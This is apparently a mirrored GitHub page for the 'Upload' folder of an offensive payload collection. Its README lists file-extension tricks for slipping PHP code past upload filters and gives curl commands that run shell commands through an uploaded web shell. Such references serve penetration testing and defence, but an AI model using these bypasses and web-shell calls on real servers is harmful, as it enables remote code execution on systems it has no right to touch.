mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00

History

swisskyrepo 14a82a14a4 Methodo, SQL,RCE,XSS,XXE updated		2016-12-20 19:46:06 +01:00
..
Image Tragik	Clean project - Renamed and added PHP juggling type	2016-10-20 10:22:24 +07:00
Insecure Flash	Methodo, SQL,RCE,XSS,XXE updated	2016-12-20 19:46:06 +01:00
JPG Resize	Clean project - Renamed and added PHP juggling type	2016-10-20 10:22:24 +07:00
Metadata GIF	Clean project - Renamed and added PHP juggling type	2016-10-20 10:22:24 +07:00
Metadata PNG	Clean project - Renamed and added PHP juggling type	2016-10-20 10:22:24 +07:00
PHP Extension	Clean project - Renamed and added PHP juggling type	2016-10-20 10:22:24 +07:00
PNG Resize	Clean project - Renamed and added PHP juggling type	2016-10-20 10:22:24 +07:00
README.md	Methodo, SQL,RCE,XSS,XXE updated	2016-12-20 19:46:06 +01:00

README.md

Upload

Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Exploits

Image Tragik

HTTP Request
Reverse Shell
Touch command

PHP Extension

.php

Less known extension
.pht
.pgif
.phtml
.shtml

Double extension
.jpeg.php
.png.php

PNG Bypass a resize - Upload the picture and use a local file inclusion

You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
curl 'http://localhost/test.php?0=system' --data "1='ls'"

JPG Bypass a resize - Upload the picture and use a local file inclusion

http://localhost/test.php?c=ls

Thanks to

Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil